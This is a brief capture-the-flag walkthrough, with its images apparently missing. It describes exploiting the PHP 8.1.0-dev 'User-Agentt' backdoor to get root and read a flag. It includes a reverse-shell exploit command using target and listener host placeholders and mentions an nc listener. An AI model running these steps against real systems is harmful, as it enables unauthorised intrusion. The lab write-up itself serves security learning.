Nmap Output:

 

 

When we look at the Nmap output and the --head information of the page, we see that it is PHP version is 8.1.0

 

 

When we search for vulnerabilities for PHP 8.1.0, we see that there is a Backdoor Remote Code Execution vulnerability. (RCE)

 

There are two ways to become a Shell. First:

 

PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution

 

 

We can download the exploit with Curl

 

 

We are root.

 

 

Commands are executed when written on a single line.

 

 

I tried to read /root/root.txt but the flag is not there.

 

Then let's search for .txt files with the “find” command.

 

 

We can see that our Flag is in the home directory.

 

Then let's move on to the second way

 

Reverse Shell

 

 

python3 exploit.py http://[TARGET_IP] [LHOST] [LPORT]

 

also dont forget nc

 

 

Since we know the location of the flag, we can read it directly.